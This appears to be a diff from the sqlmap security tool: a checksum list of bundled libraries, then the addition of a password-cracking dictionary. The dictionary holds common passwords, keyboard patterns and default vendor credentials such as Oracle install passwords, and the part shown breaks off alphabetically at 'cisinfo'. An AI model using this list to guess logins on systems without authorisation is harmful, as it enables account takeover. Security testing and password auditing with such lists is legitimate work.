+55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a thirdparty/ansistrm/ansistrm.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/ansistrm/__init__.py +dfb8a36f58a3ae72c34d6a350830857c88ff8938fe256af585d5c9c63040c5b2 thirdparty/beautifulsoup/beautifulsoup.py +7d62c59f787f987cbce0de5375f604da8de0ba01742842fb2b3d12fcb92fcb63 thirdparty/beautifulsoup/__init__.py +0915f7e3d0025f81a2883cd958813470a4be661744d7fffa46848b45506b951a thirdparty/bottle/bottle.py +9f56e761d79bfdb34304a012586cb04d16b435ef6130091a97702e559260a2f2 thirdparty/bottle/__init__.py +0ffccae46cb3a15b117acd0790b2738a5b45417d1b2822ceac57bdff10ef3bff thirdparty/chardet/big5freq.py +901c476dd7ad0693deef1ae56fe7bdf748a8b7ae20fde1922dddf6941eff8773 thirdparty/chardet/big5prober.py +df0a164bad8aac6a282b2ab3e334129e315b2696ba57b834d9d68089b4f0725f thirdparty/chardet/chardistribution.py +e9b0eef1822246e49c5f871af4881bd14ebd4c0d8f1975c37a3e82738ffd90ee thirdparty/chardet/charsetgroupprober.py +2929b0244ae3ca9ca3d1b459982e45e5e33b73c61080b6088d95e29ed64db2d8 thirdparty/chardet/charsetprober.py +558a7fe9ccb2922e6c1e05c34999d75b8ab5a1e94773772ef40c904d7eeeba0f thirdparty/chardet/codingstatemachine.py +3ca4f31e449bb5b1c3a92f4fcae8cc6d7ef8ab56bc98ca5e4130d5b10859311c thirdparty/chardet/compat.py +4d9e37e105fccf306c9d4bcbffcc26e004154d9d9992a10440bfe5370f5ff68c thirdparty/chardet/cp949prober.py +0229b075bf5ab357492996853541f63a158854155de9990927f58ae6c358f1c5 thirdparty/chardet/enums.py +924caa560d58c370c8380309d9b765c9081415086e1c05bc7541ac913a0d5927 thirdparty/chardet/escprober.py +46e5e580dbd32036ab9ddbe594d0a4e56641229742c50d2471df4402ec5487ce thirdparty/chardet/escsm.py +883f09769d084918e08e254dedfd1ef3119e409e46336a1e675740f276d2794c thirdparty/chardet/eucjpprober.py +fbb19d9af8167b3e3e78ee12b97a5aeed0620e2e6f45743c5af74503355a49fa thirdparty/chardet/euckrfreq.py +32a14c4d05f15b81dbcc8a59f652831c1dc637c48fe328877a74e67fc83f3f16 thirdparty/chardet/euckrprober.py +368d56c9db853a00795484d403b3cbc82e6825137347231b07168a235975e8c0 thirdparty/chardet/euctwfreq.py +d77a7a10fe3245ac6a9cfe221edc47389e91db3c47ab5fe6f214d18f3559f797 thirdparty/chardet/euctwprober.py +257f25b3078a2e69c2c2693c507110b0b824affacffe411bbe2bc2e2a3ceae57 thirdparty/chardet/gb2312freq.py +806bc85a2f568438c4fb14171ef348cab9cbbc46cc01883251267ae4751fca5c thirdparty/chardet/gb2312prober.py +737499f8aee1bf2cc663a251019c4983027fb144bd93459892f318d34601605a thirdparty/chardet/hebrewprober.py +62c3f9c1096c1c9d9ab85d516497f2a624ab080eff6d08919b7112fcd23bebe6 thirdparty/chardet/__init__.py +be9989bf606ed09f209cc5513c730579f4d1be8fe16b59abc8b8a0f0207080e8 thirdparty/chardet/jisfreq.py +3d894da915104fc2ccddc4f91661c63f48a2b1c1654d6103f763002ef06e9e0a thirdparty/chardet/jpcntx.py +d47a904bd3dbb678f5c508318ad24cbf0f17ea42abe4ea1c90d09959f110acf1 thirdparty/chardet/langbulgarianmodel.py +2ce0da8efb1eb47f3bc980c340a0360942d7507f3bb48db6ddd85f8e1f59c7d7 thirdparty/chardet/langcyrillicmodel.py +f18016edb53c6304896a9d2420949b3ccc35044ab31a35b3a9ca9fd168142800 thirdparty/chardet/langgreekmodel.py +2529ea984e44eb6b432d33d3bcba50b20e6038c3b83db75646f57b02f91cd070 thirdparty/chardet/langhebrewmodel.py +4616a96121b997465a3be555e056a7e6c5b4591190aa1c0133ad72c77cb1c8e0 thirdparty/chardet/langhungarianmodel.py +f25d35ef71aefd6e86f26c6640e4c417896cd98744ec5c567f74244b11065c94 thirdparty/chardet/langthaimodel.py +5b6d9e44d26ca88eae5807f05d22955969c27ab62aac8f1d6504e6fccd254459 thirdparty/chardet/langturkishmodel.py +4b6228391845937f451053a54855ad815c9b4623fa87b0652e574755c94d914f thirdparty/chardet/latin1prober.py +011f797851fdbeea927ef2d064df8be628de6b6e4d3810a85eac3cb393bdc4b4 thirdparty/chardet/mbcharsetprober.py +87a4d19e762ad8ec46d56743e493b2c5c755a67edd1b4abebc1f275abe666e1e thirdparty/chardet/mbcsgroupprober.py +498df6c15205dc7cdc8d8dc1684b29cbd99eb5b3522b120807444a3e7eed8e92 thirdparty/chardet/mbcssm.py +2c34a90a5743085958c149069300f6a05c4b94f5885974f4f5a907ff63e263be thirdparty/chardet/sbcharsetprober.py +d48a6b70207f935a9f9a7c460ba3016f110b94aa83dec716e92f1823075ec970 thirdparty/chardet/sbcsgroupprober.py +208b7e9598f4589a8ae2b9946732993f8189944f0a504b45615b98f7a7a4e4c4 thirdparty/chardet/sjisprober.py +a8bd35ef8952644e38d9e076d679e4b53f7f55c0327b4ee5685594794ae3b6d6 thirdparty/chardet/universaldetector.py +21d0fcbf7cd63ac07c38b8b23e2fb2fdfab08a9445c55f4d73578a04b4ae204c thirdparty/chardet/utf8prober.py +b29dc1d3c9ab0d707ea5fdcaf5fa89ff37831ce08b0bc46b9e04320c56a9ffb8 thirdparty/chardet/version.py +1c1ee8a91eb20f8038ace6611610673243d0f71e2b7566111698462182c7efdd thirdparty/clientform/clientform.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/clientform/__init__.py +162d2e9fe40ba919bebfba3f9ca88eab20bc3daa4124aec32d5feaf4b2ad4ced thirdparty/colorama/ansi.py +a7070aa13221d97e6d2df0f522b41f1876cd46cb1ddb16d44c1f304f7bab03a3 thirdparty/colorama/ansitowin32.py +d7b5750fa3a21295c761a00716543234aefd2aa8250966a6c06de38c50634659 thirdparty/colorama/initialise.py +f71072ad3be4f6ea642f934657922dd848dee3e93334bc1aff59463d6a57a0d5 thirdparty/colorama/__init__.py +fd2084a132bf180dad5359e16dac8a29a73ebfd267f7c9423c814e7853060874 thirdparty/colorama/win32.py +179e47739cdcb6d8f97713b4ecf2c84502ed9894d20cf941af5010a91b5275ea thirdparty/colorama/winterm.py +4f4b2df6de9c0a8582150c59de2eb665b75548e5a57843fb6d504671ee6e4df3 thirdparty/fcrypt/fcrypt.py +6a70ddcae455a3876a0f43b0850a19e2d9586d43f7b913dc1ffdf87e87d4bd3f thirdparty/fcrypt/__init__.py +dbd1639f97279c76b07c03950e7eb61ed531af542a1bdbe23e83cb2181584fd9 thirdparty/identywaf/data.json +5aa308d6173ad9e2a5006a719fdbfe8c20d7e14b6d70c04045b935e44caa96d0 thirdparty/identywaf/identYwaf.py +edf23e7105539d700a1ae1bc52436e57e019b345a7d0227e4d85b6353ef535fa thirdparty/identywaf/__init__.py +d846fdc47a11a58da9e463a948200f69265181f3dbc38148bfe4141fade10347 thirdparty/identywaf/LICENSE +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/__init__.py +879d96f2460bc6c79c0db46b5813080841c7403399292ce76fe1dc0a6ed353d8 thirdparty/keepalive/__init__.py +f517561115b0cfaa509d0d4216cd91c7de92c6a5a30f1688fdca22e4cd52b8f8 thirdparty/keepalive/keepalive.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/magic/__init__.py +4d89a52f809c28ce1dc17bb0c00c775475b8ce01c2165942877596a6180a2fd8 thirdparty/magic/magic.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/multipart/__init__.py +fa2c4cfc6f1fb29a3cf4ad119243a10aef2dfe9cf93129436aa649baef8e4764 thirdparty/multipart/multipartpost.py +ef70b88cc969a3e259868f163ad822832f846196e3f7d7eccb84958c80b7f696 thirdparty/odict/__init__.py +9a8186aeb9553407f475f59d1fab0346ceab692cf4a378c15acd411f271c8fdb thirdparty/odict/ordereddict.py +691ae693e3a33dd730930492ff9e7e3bdec45e90e3a607b869a37ecd0354c2d8 thirdparty/prettyprint/__init__.py +8df6e8c60eac4c83b1bf8c4e0e0276a4caa3c5f0ca57bc6a2116f31f19d3c33f thirdparty/prettyprint/prettyprint.py +3739db672154ad4dfa05c9ac298b0440f3f1500c6a3697c2b8ac759479426b84 thirdparty/pydes/__init__.py +d1d54fc08f80148a4e2ac5eee84c8475617e8c18bfbde0dfe6894c0f868e4659 thirdparty/pydes/pyDes.py +1c61d71502a80f642ff34726aa287ac40c1edd8f9239ce2e094f6fded00d00d4 thirdparty/six/__init__.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/socks/__init__.py +7027e214e014eb78b7adcc1ceda5aca713a79fc4f6a0c52c9da5b3e707e6ffe9 thirdparty/socks/LICENSE +543217f63a4f0a7e7b4f9063058d2173099d54d010a6a4432e15a97f76456520 thirdparty/socks/socks.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/termcolor/__init__.py +b14474d467c70f5fe6cb8ed624f79d881c04fe6aeb7d406455da624fe8b3c0df thirdparty/termcolor/termcolor.py +4db695470f664b0d7cd5e6b9f3c94c8d811c4c550f37f17ed7bdab61bc3bdefc thirdparty/wininetpton/__init__.py +7d7ec81c788600d02d557c13f9781bb33f8a699c5a44c4df0a065348ad2ee502 thirdparty/wininetpton/win_inet_pton.py diff --git a/src/sqlmap-master/data/txt/smalldict.txt b/src/sqlmap-master/data/txt/smalldict.txt new file mode 100644 index 0000000..55fe63b --- /dev/null +++ b/src/sqlmap-master/data/txt/smalldict.txt @@ -0,0 +1,9439 @@ + +!@#$% +!@#$%^ +!@#$%^& +!@#$%^&* +* +***** +****** +------ +0 +0.0.0.000 +0.0.000 +0000 +00000 +000000 +0000000 +00000000 +0000007 +000001 +000007 +0007 +0069 +007 +007007 +007bond +0101 +010101 +01011980 +01012011 +010203 +0123 +012345 +0123456 +01234567 +0123456789 +020202 +030303 +0420 +050505 +06071992 +0660 +0815 +090909 +0911 +0987 +098765 +09876543 +0987654321 +0racl3 +0racl38 +0racl38i +0racl39 +0racl39i +0racle +0racle8 +0racle8i +0racle9 +0racle9i +1 +1000 +100000 +1001 +100100 +1002 +1003 +1004 +1005 +1007 +1008 +1010 +101010 +10101010 +1011 +1012 +1013 +1014 +1015 +1016 +1017 +1018 +1020 +102030 +1022 +1023 +1024 +1025 +1026 +1027 +1028 +1029 +102938 +1030 +1031 +1066 +10sne1 +1101 +1102 +1103 +1104 +1111 +11111 +111111 +1111111 +11111111 +1111111111 +11112222 +1112 +111222 +1114 +1115 +1117 +1120 +1121 +1122 +112211 +112233 +11223344 +1123 +112358 +11235813 +1124 +1125 +1129 +1200 +1201 +1204 +1205 +120676 +1207 +1208 +1209 +1210 +1211 +1212 +121212 +12121212 +1213 +121314 +1214 +1215 +1216 +1220 +1221 +1223 +1224 +1225 +1226 +1227 +1228 +123 +1230 +123098 +1231 +12312 +123123 +12312312 +123123123 +123123a +12321 +1232323q +123321 +1234 +12341234 +1234321 +12344321 +12345 +1234554321 +123456 +1234567 +12345678 +123456789 +1234567890 +12345678910 +123456789a +123456789q +12345679 +123456a +123456q +123457 +12345a +12345q +12345qwert +1234abcd +1234qwer +1235 +123654 +123654789 +123789 +123987 +123aaa +123abc +123asd +123asdf +123go +123qwe +1245 +124578 +1269 +12axzas21a +12qwaszx +1313 +131313 +13131313 +1316 +1332 +134679 +1357 +13579 +135790 +1369 +1412 +1414 +141414 +14141414 +142536 +142857 +1430 +143143 +147147 +147258 +14725836 +147258369 +147852 +147852369 +1478963 +14789632 +1492 +1515 +151515 +159159 +159357 +159753 +159951 +1616 +161616 +1701 +1701d +1717 +171717 +17171717 +1776 +1812 +1818 +181818 +18436572 +187187 +1911 +1919 +191919 +1928 +1941 +1942 +1943 +1944 +1945 +1946 +1947 +1948 +1949 +1950 +1951 +1952 +1953 +1954 +1955 +1956 +1957 +1958 +1959 +1960 +1961 +1962 +1963 +1964 +1965 +1966 +1967 +1968 +1969 +19691969 +196969 +1970 +1971 +1972 +1973 +1974 +19741974 +1975 +1976 +1977 +1978 +19781978 +1979 +1980 +1981 +1982 +1983 +1984 +19841984 +1985 +1986 +1987 +1988 +1989 +1990 +1991 +1992 +199220706 +1993 +1994 +1995 +1996 +1997 +1998 +1999 +199999 +1a2b3c +1a2b3c4d +1chris +1kitty +1p2o3i +1passwor +1q2w3e +1q2w3e4r +1q2w3e4r5t +1qaz +1qaz2wsx +1qazxsw2 +1qw23e +1qwerty +1x2zkg8w +2000 +200000 +20002000 +2001 +20012001 +2002 +2003 +2004 +2005 +2010 +2020 +202020 +20202020 +2112 +21122112 +2121 +212121 +21212121 +22 +2200 +2211 +2222 +22222 +222222 +2222222 +22222222 +222333 +222777 +223344 +2252 +2323 +232323 +23232323 +2345 +234567 +23skidoo +2424 +242424 +24242424 +2468 +24680 +246810 +24682468 +2469 +2525 +252525 +25252525 +256879 +2580 +25802580 +2626 +262626 +2727 +272727 +2828 +282828 +292929 +2fast4u +2kids +3000gt +3006 +3010 +3030 +303030 +3112 +311311 +3131 +313131 +3141 +314159 +31415926 +315475 +321123 +321321 +321654 +3232 +323232 +332211 +333 +3333 +33333 +333333 +3333333 +33333333 +333666 +336699 +3434 +343434 +3533 +353535 +362436 +3636 +363636 +36633663 +369 +369369 +373737 +383838 +393939 +3bears +3ip76k2 +4040 +404040 +4055 +4121 +4128 +414141 +4200 +420000 +420247 +420420 +4242 +424242 +426hemi +4321 +434343 +4417 +4444 +44444 +444444 +4444444 +44444444 +445566 +4545 +454545 +456123 +456321 +456456 +456654 +4567 +456789 +464646 +4711 +474747 +4788 +4815162342 +484848 +485112 +4854 +494949 +49ers +4ever +4runner +5000 +5050 +505050 +50cent +50spanks +5121 +514007 +5150 +515000 +51505150 +515151 +5252 +525252 +5329 +535353 +5424 +54321 +543210 +5454 +545454 +5551212 +5555 +55555 +555555 +5555555 +55555555 +555666 +5656 +565656 +5678 +567890 +5683 +575757 +57chevy +585858 +606060 +616161 +6262 +626262 +6301 +635241 +636363 +646464 +654321 +655321 +656565 +6666 +66666 +666666 +6666666 +66666666 +666777 +666999 +676767 +686868 +6969 +696969 +69696969 +6996 +7007 +717171 +727272 +737373 +741852 +741852963 +747474 +753159 +753951 +757575 +7654321 +767676 +7734 +777 +7777 +77777 +777777 +7777777 +77777777 +7779311 +778899 +786786 +787878 +789123 +7894 +789456 +78945612 +789456123 +789654 +789789 +789987 +797979 +7dwarfs +80486 +818181 +81fukkc +852456 +8675309 +868686 +87654321 +878787 +8888 +88888 +888888 +8888888 +88888888 +8989 +898989 +90210 +909090 +911 +911911 +9379992 +951753 +963852 +969696 +987456 +9876 +98765 +987654 +98765432 +987654321 +987987 +989898 +9999 +99999 +999999 +9999999 +99999999 +999999999 +????? +?????? +@#$%^& +ABC123 +Abcdef +Abcdefg +Admin +Alexis +Alpha +Andrew +Animals +Anthony +Ariel +Asdfgh +BOSS +Bailey +Bastard +Beavis +Bismillah +Bond007 +Bonzo +Booboo +Boston +Broadway +Canucks +Cardinal +Carol +Casio +Celtics +Champs +ChangeMe +Changeme +Charlie +Chris +Computer +Cougar +Creative +Curtis +Daniel +Darkman +Denise +Dragon +Eagles +Elizabeth +Esther +Family +Figaro +Fisher +Fishing +Fortune +Freddy +Friday +Friends +Front242 +FuckYou +Fuckyou +Gandalf +Geronimo +Gingers +Gizmo +Golden +Goober +Gretel +HARLEY +Hacker +Hammer +Harley +Heather +Hello +Hendrix +Henry +Hershey +Homer +Internet +JSBach +Jackson +Janet +Jeanne +Jennifer +Jersey +Jessica +Joanna +Johnson +Jordan +Joshua +KILLER +Katie +Killer +Kitten +Knight +Liberty +Lindsay +Lizard +Login +Madeline +Margaret +Master +Matthew +Maxwell +Mellon +Merlot +Metallic +Michael +Michel +Michel1 +Michelle +Monday +Money +Monster +Montreal +NCC1701 +Newton +Nicholas +Noriko +OU812 +October +PASSWORD +PPP +Paladin +Pamela +Passw0rd +Password +Password1 +Peaches +Peanuts +Pentium +Pepper +Peter +Phoenix +Piglet +Pookie +Princess +Purple +Qwert +Qwerty +Rabbit +Raiders +Raistlin +Random +Rebecca +Robert +Russell +Sammy +Saturn +Service +Shadow +Sidekick +Sierra +Skeeter +Smokey +Snoopy +Sparky +Speedy +Sterling +Steven +Summer +Sunshine +Superman +Sverige +Swoosh +Taurus +Taylor +Tennis +Theresa +Thomas +Thunder +Tigger +Tuesday +Usuckballz1 +Vernon +Victoria +Vincent +Waterloo +Webster +Willow +Windows +Winnie +Wolverine +Woodrow +World +Zxcvb +Zxcvbnm +a +a12345 +a123456 +a1234567 +a1b2c3 +a1b2c3d4 +aa +aaa +aaa111 +aaaa +aaaaa +aaaaaa +aaaaaaa +aaaaaaaa +aaliyah +aardvark +aaron +aaron1 +abacab +abbott +abby +abc +abc123 +abc1234 +abc12345 +abcabc +abcd +abcd123 +abcd1234 +abcde +abcdef +abcdefg +abcdefgh +aberdeen +abgrtyu +abigail +abm +abnormal +abraham +absolut +absolute +absolutely +abstr +academia +academic +access +access14 +accord +account +ace +aceace +achilles +achtung +acidburn +acropolis +action +active +acura +ada +adam +adam12 +adams +addict +addison +adg +adgangskode +adi +adidas +adldemo +admin +admin1 +admin12 +admin123 +adminadmin +administrator +admiral +adobe1 +adobe123 +adobeadobe +adonis +adrian +adriana +adrianna +adrienne +adrock +adult +adults +advance +advent +advil +aerobics +africa +again +agent +aggies +agosto +agustin +ahl +ahm +aikido +aikman +aileen +airborne +airbus +airforce +airman +airoplane +airplane +airport +airwolf +aisan +ak +akf7d98s2 +aki123 +akira +alabama +aladin +alan +alanis +alaska +albany +albatros +albatross +albert +alberta +alberto +albion +alchemy +alcohol +alejandr +alejandra +alejandro +alex +alex1 +alexalex +alexande +alexander +alexandr +alexandra +alexia +alexis +alf +alfa +alfaro +alfred +alfredo +algebra +ali +alias +aliases +alibaba +alice +alice1 +alicia +alien +aliens +alina +aline +alisa +alisha +alison +alissa +alive +all4one +allan +allegro +allen +alleycat +allgood +alliance +allison +allmine +allo +allsop +allstar +allstate +almighty +almond +aloha +alone +alpha +alpha1 +alphabet +alpine +alr +altamira +althea +altima +altima1 +alucard +always +alyssa +ama +amadeus +amanda +amanda1 +amateur +amateurs +amazing +amazon +amber +amber1 +ambers +ambrose +ambrosia +amelia +amelie +america +america1 +american +amethyst +amigo +amigos +amorphous +amour +ams +amstel +amsterda +amsterdam +amv +amy +anaconda +anakin +anal +analog +analsex +anarchy +anastasi +anchor +anders +andersen +anderson +andre +andre1 +andrea +andrea1 +andreas +andres +andrew +andrew! +andrew1 +andrey +andromache +andromed +andromeda +andy +andyod22 +anfield +angel +angel1 +angela +angelica +angelika +angelina +angelito +angelo +angels +angelus +angerine +angie +angie1 +angus +angus1 +animal +animals +anime +anita +ann +anna +annabell +anne +anneli +annette +annie +annie1 +annika +annmarie +anonymous +another +answer +antares +antelope +anthony +anthony1 +anthrax +anthropogenic +antoine +anton +antonia +antonio +antony +anubis +anvils +anything +aolsucks +ap +apache +apollo +apollo13 +apple +apple1 +apple123 +apple2 +applepie +apples +applmgr +applsys +applsyspub +apppassword +apps +april +april1 +aprilia +aptiva +aq +aqdemo +aqjava +aqua +aquarius +aquser +ar +aragorn +aramis +arcadia +archange +archer +archie +area51 +argentin +argentina +aria +ariadne +ariana +ariane +arianna +ariel +aries +arizona +arkansas +arlene +armada +armand +armando +armani +armstron +army +arnold +around +arrow +arrows +arsenal +arsenal1 +artemis +arthur +artist +arturo +asasas +asd +asd123 +asdasd +asddsa +asdf +asdf12 +asdf123 +asdf1234 +asdf;lkj +asdfasdf +asdfg +asdfgh +asdfghj +asdfghjk +asdfghjkl +asdfjkl +asdfjkl; +asdsa +asdzxc +asf +asg +asgard +ashlee +ashleigh +ashley +ashley1 +ashraf +ashton +asia +asian +asians +asimov +asl +asm +aso +asp +aspateso19 +aspen +aspire +ass +assass +assassin +assfuck +asshole +asshole1 +assholes +assman +assmunch +assword +ast +asterix +astra +astral +astrid +astro +astros +ath +athena +athens +athlon +atlanta +atlantic +atlantis +atlas +atmosphere +atomic +attack +atticus +attila +attitude +aubrey +auburn +audi +audia4 +audio +audiouser +auditt +audrey +auggie +august +august07 +augusta +augustus +aurelie +aurora +aussie +austin +austin1 +austin31 +australi +australia +austria +auto +autumn +avalanch +avalon +avatar +avenger +avenir +avenue +aviation +awesome +awful +awnyce +ax +ayelet +aylmer +az +az1943 +azazel +azerty +azertyui +azsxdc +aztecs +azure +azzer +baba +babe +babes +babies +baby +babybaby +babyblue +babyboy +babycake +babydoll +babyface +babygirl +babygirl1 +babygurl1 +babylon +babylon5 +babylove +bacardi +bacchus +bach +back +backdoor +backup +backupexec +bacon +badass +badboy +baddog +badger +badgers +badgirl +badman +baggins +baggio +bahamut +bailey +bailey1 +baker +balance +baldwin +ball +baller +ballet +ballin +ballin1 +balloon +balloons +balls +bambam +bambi +bamboo +banana +bananas +banane +bandit +bang +bangbang +banger +bangkok +bank +banker +banks +banner +banshee +banzai +bar +baraka +barbados +barbara +barber +barbie +barcelon +barcelona +barefoot +barfly +baritone +barker +barkley +barley +barn +barnes +barney +barney1 +barnyard +baron +barrett +barron +barry +barry1 +bart +bartman +barton +base +baseball +baseball1 +basf +basic +basil +basket +basketba +basketball +bass +basset +bassman +bassoon +bastard +bastards +batch +bathing +batman +batman1 +battery +battle +baxter +bayern +baylor +bball +bbbb +bbbbb +bbbbbb +bbbbbbb +bbbbbbbb +bc4j +bcfields +bdsm +beach +beaches +beacon +beagle +beaker +beamer +bean +bean21 +beaner +beanie +beans +bear +bearbear +bearcat +bearcats +beardog +bears +beast +beastie +beasty +beater +beatle +beatles +beatrice +beatriz +beautifu +beautiful +beauty +beaver +beavis +beavis1 +bebe +because +becca +becker +beckham +becky +bedford +beebop +beech +beefcake +beemer +beer +beerbeer +beerman +beethoven +beetle +beezer +belgium +believe +belinda +belize +bell +bella +bella1 +belle +belmont +beloved +ben +benben +bender +benfica +beng +bengals +benito +benjamin +benji +bennett +bennie +benny +benoit +benson +bentley +benz +beowulf +berenice +beretta +berger +bergkamp +berkeley +berlin +berliner +bermuda +bernard +bernardo +bernie +berry +bert +bertha +bertie +beryl +bessie +best +bestbuy +beta +betacam +beth +bethany +betito +betsie +betsy +better +betty +beverly +bharat +bian +bianca +biao +biatch +bic +bicameral +bichilora +bichon +bicycle +bigal +bigass +bigballs +bigbear +bigben +bigbig +bigbird +bigblock +bigblue +bigbob +bigboobs +bigbooty +bigboss +bigboy +bigbutt +bigcat +bigcock +bigdaddy +bigdawg +bigdick +bigdicks +bigdog +bigfish +bigfoot +bigger +biggie +biggles +biggun +bigguns +bigguy +bighead +bigmac +bigman +bigmike +bigmoney +bigone +bigones +bigpimp +bigpoppa +bigred +bigsexy +bigtime +bigtit +bigtits +biit +bike +biker +bikini +bil +bilbo +bill +billabon +billie +bills +billy +billy1 +billybob +billyboy +bim +bimbo +bimmer +bing +bingo +bingo1 +binky +binladen +bioboy +biochem +biology +bird +bird33 +birddog +birdie +birdman +birdy +birgit +birthday +bis +biscuit +bishop +bismillah +bisounours +bitch +bitch1 +bitchass +bitches +bitchy +biteme +bitter +biv +bix +biz +bizkit +blabla +black +black1 +blackbir +blackcat +blackdog +blackhaw +blackie +blackjac +blackjack +blacklab +blackman +blackout +blacks +blacky +blade +blades +blah +blahblah +blaine +blake +blam +blanca +blanche +blanco +blast +blaster +blaze +blazer +bledsoe +blessed +blessing +blewis +blinds +blink182 +bliss +blitz +blizzard +blond +blonde +blondes +blondie +blood +bloody +blossom +blow +blowfish +blowjob +blowme +blubber +blue +blue12 +blue123 +blue1234 +blue22 +blue32 +blue42 +blue99 +blueball +bluebell +bluebird +blueblue +blueboy +bluedog +blueeyes +bluefish +bluejays +bluejean +bluemoon +blues +blues1 +bluesky +bluesman +bmw +bmw325 +bmwbmw +boat +boater +boating +bob +bob123 +bobafett +bobbie +bobbob +bobby +bobby1 +bobcat +bobdole +bobdylan +bobo +bobobo +bodhisattva +body +boeing +bogart +bogey +bogus +bohica +boiler +bolitas +bollocks +bollox +bologna +bolton +bom +bomb +bombay +bomber +bombers +bonanza +bonbon +bond +bond007 +bondage +bone +bonehead +boner +bones +bongo +bonita +bonjour +bonjovi +bonkers +bonner +bonnie +bonsai +boob +boobear +boobie +boobies +booboo +boobs +booger +boogie +book +booker +bookie +books +bookworm +boom +boomer +boomer1 +booster +bootie +boots +bootsie +bootsy +booty +bootys +booyah +boozer +borabora +bordeaux +borders +boricua +boris +borussia +bosco +boss +boss123 +bossman +boston +bottle +bottom +boulder +bounce +bounty +bourbon +bowler +bowling +bowman +bowser +bowtie +bowwow +boxcar +boxer +boxers +boxing +boxster +boyboy +boys +boytoy +boyz +bozo +br0d3r +br549 +brad +bradford +bradley +brady +brain +brains +branch +brandi +brando +brandon +brandon1 +brandy +brandy1 +brasil +braves +bravo +brazil +breaker +breanna +breast +breasts +breeze +brenda +brendan +brennan +brent +brest +brett +brewer +brewster +brian +brian1 +briana +brianna +bricks +bridge +bridges +bridget +briggs +bright +brighton +brigitte +brio_admin +bristol +britain +british +britney +brittany +brittney +broadway +brodie +broken +broker +bronco +broncos +broncos1 +bronson +bronte +bronze +brook +brooke +brooklyn +brooks +brother +brothers +brown +brown1 +brownie +browning +browns +bruce +bruce1 +brucelee +bruins +bruiser +brujita +bruno +bruno1 +brutus +bryan +bryant +bsc +bsd +bubba +bubba1 +bubba123 +bubba69 +bubbas +bubble +bubbles +bubbles1 +buceta +buck +bucket +buckeye +buckeyes +buckley +bucks +buckshot +budapest +buddah +buddha +buddie +buddy +buddy1 +buddy123 +buddyboy +budgie +budlight +budman +budweise +buffalo +buffalo1 +buffet +buffett +buffy +buffy1 +bug_reports +bugger +bugs +bugsy +builder +building +bukkake +bull +bulldog +bulldog1 +bulldogs +bullet +bullfrog +bulls +bullseye +bullshit +bumble +bumbling +bummer +bumper +bunghole +bungle +bunker +bunnies +bunny +bunny1 +burger +burgess +burn +burner +burning +burnout +burns +burrito +burton +bush +bushido +business +busted +buster +buster1 +busty +butch +butcher +butkus +butler +butt +butter +buttercu +buttercup +butterfl +butterfly +butters +buttfuck +butthead +butthole +buttman +button +buttons +butts +buzz +buzzard +buzzer +byebye +byron +byteme +c00per +caballo +cabbage +cabernet +cable +cabron +caca +cachonda +cactus +cad +cadillac +caesar +cafc91 +caitlin +calendar +calgary +calibra +calico +caliente +californ +california +caligula +calimero +call +callaway +callie +callisto +callum +calvin +calvin1 +camaro +camaross +camay +camber +camden +camel +camelot +camels +cameltoe +camera +camero +cameron +cameron1 +camila +camilla +camille +campanile +campbell +camper +camping +campus +canada +canadian +cancel +cancer +cancun +candace +candi +candice +candle +candy +candy1 +candyass +candyman +canela +cang +cannabis +cannon +cannondale +canon +cantona +cantor +canuck +canucks +canyon +capecod +capetown +capital +capone +caprice +capricor +capslock +captain +captain1 +car +caramel +caravan +carbon +card +cardiff +cardinal +cardinals +cards +carebear +caren +carina +carl +carla +carlito +carlitos +carlo +carlos +carlton +carman +carmel +carmen +carmen1 +carmex2 +carnage +carnival +carol +carol1 +carole +carolina +caroline +carolyn +carpedie +carpente +carpet +carrera +carrie +carroll +carrot +carrots +cars +carson +carter +cartman +cartoon +cartoons +carver +casanova +cascade +cascades +casey +casey1 +cash +cashmone +casino +casio +casper +casper1 +cassandr +cassandra +cassidy +cassie +caster +castillo +castle +castor +castro +cat +cat123 +catalina +catalog +catcat +catch22 +catcher +catdog +catfish +catherin +catherine +cathy +catman +catnip +cats +cattle +catwoman +caught +cavalier +caveman +cayman +cayuga +cbr600 +cbr900rr +ccbill +cccc +ccccc +cccccc +ccccccc +cccccccc +cct +cdemo82 +cdemo83 +cdemocor +cdemorid +cdemoucb +cdouglas +ce +ceasar +cecile +cecilia +cecily +cedic +cedric +celeb +celebrity +celeron +celeste +celica +celine +celtic +celtics +cement +ceng +center +centra +central +century +cerberus +cerulean +cesar +cessna +chacha +chad +chai +chains +chainsaw +chair +challeng +challenge +chambers +chameleon +champ +champion +champs +chan +chance +chandler +chandra +chanel +chang +change +change_on_install +changeit +changeme +changes +channel +chantal +chao +chaos +chaos1 +chapman +charger +chargers +charisma +charity +charlene +charles +charles1 +charley +charlie +charlie1 +charlie2 +charlott +charlotte +charlton +charly +charmed +charming +charon +charter +chase +chase1 +chaser +chat +chavez +cheater +check +checker +checkers +cheddar +cheech +cheeks +cheeky +cheerleaers +cheers +cheese +cheese1 +cheetah +chef +chelle +chelsea +chelsea1 +chem +chemical +chemistry +cheng +cherokee +cherries +cherry +cheryl +cheshire +chess +chessie +chester +chester1 +chestnut +chevelle +chevrole +chevrolet +chevy +chevy1 +chevys +chewie +chewy +cheyenne +chiara +chicago +chicago1 +chichi +chick +chicken +chicken1 +chickens +chicks +chico +chief +chiefs +children +chill +chilli +chillin +chilly +chimera +china +chinacat +chinese +chinook +chip +chipmunk +chipper +chippy +chips +chiquita +chivas +chloe +chloe1 +chocha +chocolat +chocolate +chocolate! +chocolate1 +choice +choke +chong +choochoo +chopin +chopper +chou +chouette +chris +chris1 +chris123 +chris6 +chrisbln +chriss +chrissy +christ +christ1 +christa +christi +christia +christian +christie +christin +christina +christine +christma +christmas +christop +christoph +christopher +christy +chrome +chronic +chrono +chronos +chrysler +chuai +chuang +chubby +chuck +chuckie +chuckles +chucky +chui +chun +chunky +chuo +church +ciccio +cicero +cids +cigar +cigars +cinder +cindy +cindy1 +cinema +cinnamon +circle +circuit +circus +cirque +cirrus +cis +cisco +cisinfo 